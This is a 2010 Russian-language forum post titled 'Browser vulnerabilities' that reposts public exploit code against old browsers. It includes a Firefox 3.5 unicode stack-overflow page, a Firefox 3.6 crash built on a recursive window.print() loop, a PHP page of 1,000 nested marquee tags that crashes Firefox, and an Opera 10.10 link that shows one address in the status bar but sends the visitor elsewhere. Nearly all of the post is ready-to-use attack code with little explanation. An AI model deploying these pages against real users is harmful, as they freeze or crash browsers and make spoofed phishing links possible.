Тема: Уязвимости браузеров
Показать сообщение отдельно

Уязвимости браузеров
  #1  
Старый 23.03.2010, 23:43
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами: 8728261

Репутация: 211
По умолчанию Уязвимости браузеров
Firefox 3.5 unicode stack overflow. Andrew Haynes , Simon Berry-Byrne




Код:
<html>
<head>
<script language="JavaScript" type="Text/Javascript">
	var str = unescape("%u4141䅁");
	var str2 = unescape("");
	var finalstr2 = mul8(str2, 49000000);
	var finalstr = mul8(str,   21000000);


document.write(finalstr2); 
document.write(finalstr); 

function mul8 (str, num) {
	var	i = Math.ceil(Math.log(num) / Math.LN2),
		res = str;
	do {
		res += res;
	} while (0 < --i);
	return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>

# milw0rm.com [2009-07-15]
Добавлено через 12 минут
Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
Код:
# EDB-ID: 11432
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Asheesh kumar Mani Tripathi
# Published: 2010-02-13
# Verified: yes
# Download Exploit Code
# Download N/A

view source
print?
                     =======================================================================
 
                      Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
                     =======================================================================
 
                                                     by
 
                                            Asheesh Kumar Mani Tripathi
 
 
# code by Asheesh kumar Mani Tripathi
 
# email informationhacker08@gmail.com
 
# company       aksitservices
 
# Credit by Asheesh Anaconda
 
 
#Download www.mozilla.com/firefox
 
 
#Background
 
Mozilla Firefox is a popular internet browser. .....:)
 
#Vulnerability
This bug is a typical result of multitudinous  loop. 
The flaw exists when the attacker put window.printer() funtion
in multitudinous loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
 
 
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any   might be lost.
 
 
 
#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
 
========================================================================================================================
 
                                                           asheesh.html
========================================================================================================================
 
<html>
<title>asheesh kumar mani tripathi</title>
 
<script>
 
 
function
asheesh()
{
window.onerror=new Function("history.go(0)");
window.print();
asheesh();
 
 
}
asheesh();
</script>
 
</html>
                                                            
========================================================================================================================
 
 
#If you have any questions, comments, or concerns, feel free to contact me.
Добавлено через 42 минуты
Mozilla Firefox <= 3.6 Denial Of Service Exploit
Код:
# EDB-ID: 11590
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Ale46
# Published: 2010-02-27
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print?
<?php
 
/*
*    Title: Mozilla Firefox <=3.6 - Remote Denial Of Service Exploit
*    Date: 25/02/10
*    Author: Ale46 - ale46[at]paranoici[dot]org
*    Software Link: http://www.mozilla-europe.org/en/firefox/
*    Version: 3.6 and 3.5.8 are vulnerable so I think that all versions <= 3.6 have the same issue
*    Tested on: Windows 7 x32\x64 - Ubuntu 9.10 x32
*    Description: visiting this php page you'll get an instant crash of Firefox
*    Greetz: Gandalf
*    Extra Greetz: University of Palermo and its fantastics rules for the Computer Engineering degree (how beautiful 's irony)
*/
 
$a = '<marquee>';
$b = '</marquee>';
 
for ($i=0;$i<=1000;$i++){
    $a .= '<marquee>';
    $b .= '</marquee>';
}
 
echo '<body>';
echo $a;
echo "hadouken!";
echo $b;
echo '</body>';
 
?>
Opera 10.10 Status Bar Obfuscation
Код:
<center><h1>Opera 10.10 Status Bar Obfuscation</h1>
<br>
<strong>Author : 599eme Man.<br >
Contact : flouf@live.fr</strong><br >
_______________________________________________________________________
<br>
<br>
<br>
 
Click on google (look the Status bar) and you'll be redirect on Yahoo<br><strong><h1><a onclick="javascript:OB();" href="http://www.Google.com">http://www.Google.com</a></h1></strong></center>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
                           <font style="font-family:arial;font-size:32px">Look Here<br>
                   | <br>
                  V
 
<script>
 
function OB() {
 
document.write('');
document.location='http://yahoo.com';
 
}
 
</script>
Цитата:
также подвержен IE 7
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось 547; 23.03.2010 в 23:51..
 
Ответить с цитированием